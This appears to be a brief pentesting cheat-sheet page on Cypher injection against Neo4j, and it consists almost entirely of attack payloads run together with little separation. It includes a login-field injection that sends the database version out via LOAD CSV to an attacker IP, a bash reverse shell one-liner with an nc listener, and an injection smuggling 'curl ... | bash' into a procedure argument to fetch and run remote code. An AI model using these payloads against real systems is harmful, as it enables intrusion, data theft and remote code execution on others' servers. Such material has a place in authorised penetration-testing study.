Cypher Neo4j Injection - Pentesting Web
Mis à jour
{
"username": "' OR 1=1 WITH 1 AS a CALL dbms.components() YIELD versions UNWIND versions AS version LOAD CSV FROM 'http://10.10.14.90/?v=' + version AS l RETURN 0 AS _0 //",
"password": "test"
}python3 -m http.server 80
# --> 5.24.1#!/bin/bash
bash -i >& /dev/tcp/10.10.14.80/443 0>&1nc -nlvp 443{
"username": "admin' return h.value AS value UNION CALL custom.getUrlStatusCode(\"127.0.0.1;curl 10.10.14.90/index.html | bash;\") YIELD statusCode AS value RETURN value ; //",
"password": "test"
}